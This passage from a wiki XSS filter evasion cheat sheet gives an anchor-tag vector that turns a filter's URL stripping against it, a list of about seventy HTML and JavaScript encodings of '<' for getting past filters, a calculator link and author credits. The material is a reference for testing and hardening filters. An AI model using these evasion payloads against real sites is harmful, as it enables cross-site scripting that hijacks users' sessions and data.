Assuming "http://www.google.com/" is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: "java&#x09;script:" was converted into "java	script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera):
<nowiki><A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A></nowiki>

== Character escape sequences ==
All the possible combinations of the character "<" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.

<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

= Character Encoding and IP Obfuscation Calculators =

This following links include calculators for doing basic transformation functions that are useful for XSS.

[http://ha.ckers.org/xsscalc.html http://ha.ckers.org/xsscalc.html]

= Authors and Primary Editors =

Robert "RSnake" Hansen from [[www.fallingrocknetworks.com]]

= Other Cheatsheets =

{{Cheatsheet_Navigation}}

[[Category:Cheatsheets]]